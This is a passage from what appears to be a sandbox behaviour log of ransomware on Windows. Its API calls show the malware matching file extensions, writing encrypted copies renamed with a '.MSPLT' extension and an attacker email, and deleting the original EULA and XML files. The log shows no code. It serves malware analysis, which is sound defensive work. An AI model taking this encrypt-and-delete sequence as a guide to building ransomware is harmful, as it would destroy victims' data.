(lpString=".zip") returned 4 [0168.882] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0168.882] lstrlenW (lpString=".rar") returned 4 [0168.882] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0168.882] lstrlenW (lpString=".bz2") returned 4 [0168.882] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0168.882] lstrlenW (lpString=".7z") returned 3 [0168.882] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0168.882] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.882] lstrlenW (lpString=".dbf") returned 4 [0168.882] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0168.882] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.882] lstrlenW (lpString=".1cd") returned 4 [0168.882] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0168.882] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.882] lstrlenW (lpString=".jpg") returned 4 [0168.883] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0168.883] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.883] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.883] lstrlenW (lpString=".doc") returned 4 [0168.883] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0168.883] lstrlenW (lpString=".docx") returned 5 [0168.883] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0168.883] lstrlenW (lpString=".pdf") returned 4 [0168.883] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0168.883] lstrlenW (lpString=".xls") returned 4 [0168.883] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0168.883] lstrlenW (lpString=".xlsx") returned 5 [0168.883] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0168.883] lstrlenW (lpString=".ppt") returned 4 [0168.883] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0168.883] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.883] lstrlenW (lpString=".zip") returned 4 [0168.883] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0168.883] lstrlenW (lpString=".rar") returned 4 [0168.883] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0168.883] lstrlenW (lpString=".bz2") returned 4 [0168.883] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0168.883] lstrlenW (lpString=".7z") returned 3 [0168.883] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0168.883] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.883] lstrlenW (lpString=".dbf") returned 4 [0168.883] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0168.883] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.883] lstrlenW (lpString=".1cd") returned 4 [0168.883] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0168.883] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.883] lstrlenW (lpString=".jpg") returned 4 [0168.884] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0168.884] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0168.884] lstrlenW (lpString="LocalizedData.xml") returned 17 [0168.884] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.884] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=77748) returned 1 [0168.884] CloseHandle (hObject=0x304) returned 1 [0168.884] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml")) returned 0x80 [0168.884] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.884] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.885] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.885] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.885] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0168.885] GetLastError () returned 0x0 [0168.885] ReadFile (in: hFile=0x304, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x12fb4, lpOverlapped=0x0) returned 1 [0168.889] WriteFile (in: hFile=0x308, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x12fc0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x12fc0, lpOverlapped=0x0) returned 1 [0168.891] ReadFile (in: hFile=0x304, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0168.891] WriteFile (in: hFile=0x308, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xf6, lpOverlapped=0x0) returned 1 [0168.891] SetEndOfFile (hFile=0x308) returned 1 [0168.891] CloseHandle (hObject=0x308) returned 1 [0168.895] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.895] SetEndOfFile (hFile=0x304) returned 1 [0168.896] CloseHandle (hObject=0x304) returned 1 [0168.896] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0168.897] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml")) returned 1 [0168.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.897] lstrlenW (lpString=".doc") returned 4 [0168.897] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0168.897] lstrlenW (lpString=".docx") returned 5 [0168.897] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0168.897] lstrlenW (lpString=".pdf") returned 4 [0168.897] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0168.897] lstrlenW (lpString=".xls") returned 4 [0168.897] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0168.897] lstrlenW (lpString=".xlsx") returned 5 [0168.897] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0168.897] lstrlenW (lpString=".ppt") returned 4 [0168.897] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0168.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.897] lstrlenW (lpString=".zip") returned 4 [0168.897] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0168.897] lstrlenW (lpString=".rar") returned 4 [0168.897] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0168.898] lstrlenW (lpString=".bz2") returned 4 [0168.898] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0168.898] lstrlenW (lpString=".7z") returned 3 [0168.898] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0168.898] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.898] lstrlenW (lpString=".dbf") returned 4 [0168.898] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0168.898] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.898] lstrlenW (lpString=".1cd") returned 4 [0168.898] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0168.898] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.898] lstrlenW (lpString=".jpg") returned 4 [0168.898] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0168.898] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.898] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.898] lstrlenW (lpString=".doc") returned 4 [0168.898] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0168.898] lstrlenW (lpString=".docx") returned 5 [0168.898] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0168.898] lstrlenW (lpString=".pdf") returned 4 [0168.898] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0168.898] lstrlenW (lpString=".xls") returned 4 [0168.898] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0168.898] lstrlenW (lpString=".xlsx") returned 5 [0168.898] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0168.898] lstrlenW (lpString=".ppt") returned 4 [0168.898] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0168.898] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.898] lstrlenW (lpString=".zip") returned 4 [0168.898] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0168.898] lstrlenW (lpString=".rar") returned 4 [0168.898] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0168.898] lstrlenW (lpString=".bz2") returned 4 [0168.899] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0168.899] lstrlenW (lpString=".7z") returned 3 [0168.899] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0168.899] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.899] lstrlenW (lpString=".dbf") returned 4 [0168.899] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0168.899] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.899] lstrlenW (lpString=".1cd") returned 4 [0168.899] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0168.899] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 44 [0168.899] lstrlenW (lpString=".jpg") returned 4 [0168.899] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0168.899] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0168.899] lstrlenW (lpString="eula.rtf") returned 8 [0168.899] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.899] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=3419) returned 1 [0168.899] CloseHandle (hObject=0x304) returned 1 [0168.899] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf")) returned 0x80 [0168.900] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.900] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.900] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.900] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.900] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0169.206] GetLastError () returned 0x0 [0169.206] ReadFile (in: hFile=0x304, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xd5b, lpOverlapped=0x0) returned 1 [0169.254] WriteFile (in: hFile=0x300, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xd60, lpOverlapped=0x0) returned 1 [0169.255] ReadFile (in: hFile=0x304, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0169.255] WriteFile (in: hFile=0x300, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xe4, lpOverlapped=0x0) returned 1 [0169.255] SetEndOfFile (hFile=0x300) returned 1 [0169.255] CloseHandle (hObject=0x300) returned 1 [0169.256] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0169.256] SetEndOfFile (hFile=0x304) returned 1 [0169.258] CloseHandle (hObject=0x304) returned 1 [0169.258] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.258] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf")) returned 1 [0169.258] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.258] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.259] lstrlenW (lpString=".doc") returned 4 [0169.259] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.259] lstrlenW (lpString=".docx") returned 5 [0169.259] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.259] lstrlenW (lpString=".pdf") returned 4 [0169.259] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.259] lstrlenW (lpString=".xls") returned 4 [0169.259] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.259] lstrlenW (lpString=".xlsx") returned 5 [0169.259] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.259] lstrlenW (lpString=".ppt") returned 4 [0169.259] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.259] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.259] lstrlenW (lpString=".zip") returned 4 [0169.259] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.259] lstrlenW (lpString=".rar") returned 4 [0169.259] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.259] lstrlenW (lpString=".bz2") returned 4 [0169.259] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.259] lstrlenW (lpString=".7z") returned 3 [0169.259] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.260] lstrlenW (lpString=".dbf") returned 4 [0169.260] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.260] lstrlenW (lpString=".1cd") returned 4 [0169.260] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.260] lstrlenW (lpString=".jpg") returned 4 [0169.260] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.260] lstrlenW (lpString=".doc") returned 4 [0169.260] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.260] lstrlenW (lpString=".docx") returned 5 [0169.260] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.260] lstrlenW (lpString=".pdf") returned 4 [0169.260] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.260] lstrlenW (lpString=".xls") returned 4 [0169.260] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.260] lstrlenW (lpString=".xlsx") returned 5 [0169.260] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.260] lstrlenW (lpString=".ppt") returned 4 [0169.260] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.260] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.260] lstrlenW (lpString=".zip") returned 4 [0169.261] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.261] lstrlenW (lpString=".rar") returned 4 [0169.261] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.261] lstrlenW (lpString=".bz2") returned 4 [0169.261] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.261] lstrlenW (lpString=".7z") returned 3 [0169.261] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.261] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.261] lstrlenW (lpString=".dbf") returned 4 [0169.261] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.261] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.261] lstrlenW (lpString=".1cd") returned 4 [0169.261] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.261] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 35 [0169.261] lstrlenW (lpString=".jpg") returned 4 [0169.261] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.261] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0169.261] lstrlenW (lpString="eula.rtf") returned 8 [0169.261] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0169.262] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=3188) returned 1 [0169.262] CloseHandle (hObject=0x304) returned 1 [0169.262] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf")) returned 0x80 [0169.262] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.262] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0169.262] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0169.262] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0169.262] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0169.274] GetLastError () returned 0x0 [0169.274] ReadFile (in: hFile=0x304, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xc74, lpOverlapped=0x0) returned 1 [0169.277] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xc80, lpOverlapped=0x0) returned 1 [0169.278] ReadFile (in: hFile=0x304, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0169.278] WriteFile (in: hFile=0x2fc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xe4, lpOverlapped=0x0) returned 1 [0169.278] SetEndOfFile (hFile=0x2fc) returned 1 [0169.278] CloseHandle (hObject=0x2fc) returned 1 [0169.279] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0169.279] SetEndOfFile (hFile=0x304) returned 1 [0169.280] CloseHandle (hObject=0x304) returned 1 [0169.281] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.281] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf")) returned 1 [0169.281] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.281] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.281] lstrlenW (lpString=".doc") returned 4 [0169.281] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.282] lstrlenW (lpString=".docx") returned 5 [0169.282] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.282] lstrlenW (lpString=".pdf") returned 4 [0169.282] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.282] lstrlenW (lpString=".xls") returned 4 [0169.282] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.282] lstrlenW (lpString=".xlsx") returned 5 [0169.282] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.282] lstrlenW (lpString=".ppt") returned 4 [0169.282] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.282] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.282] lstrlenW (lpString=".zip") returned 4 [0169.282] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.282] lstrlenW (lpString=".rar") returned 4 [0169.282] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.282] lstrlenW (lpString=".bz2") returned 4 [0169.282] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.282] lstrlenW (lpString=".7z") returned 3 [0169.282] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.282] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.282] lstrlenW (lpString=".dbf") returned 4 [0169.282] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.282] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.282] lstrlenW (lpString=".1cd") returned 4 [0169.282] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.282] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.282] lstrlenW (lpString=".jpg") returned 4 [0169.282] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.283] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.283] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.283] lstrlenW (lpString=".doc") returned 4 [0169.283] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.283] lstrlenW (lpString=".docx") returned 5 [0169.283] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.283] lstrlenW (lpString=".pdf") returned 4 [0169.283] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.283] lstrlenW (lpString=".xls") returned 4 [0169.283] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.283] lstrlenW (lpString=".xlsx") returned 5 [0169.283] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.283] lstrlenW (lpString=".ppt") returned 4 [0169.283] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.283] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.283] lstrlenW (lpString=".zip") returned 4 [0169.283] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.283] lstrlenW (lpString=".rar") returned 4 [0169.283] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.283] lstrlenW (lpString=".bz2") returned 4 [0169.283] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.283] lstrlenW (lpString=".7z") returned 3 [0169.283] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.283] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.283] lstrlenW (lpString=".dbf") returned 4 [0169.283] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.283] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0169.284] lstrlenW (lpString=".1cd") returned 4 [0169.284] lstrcmpiW 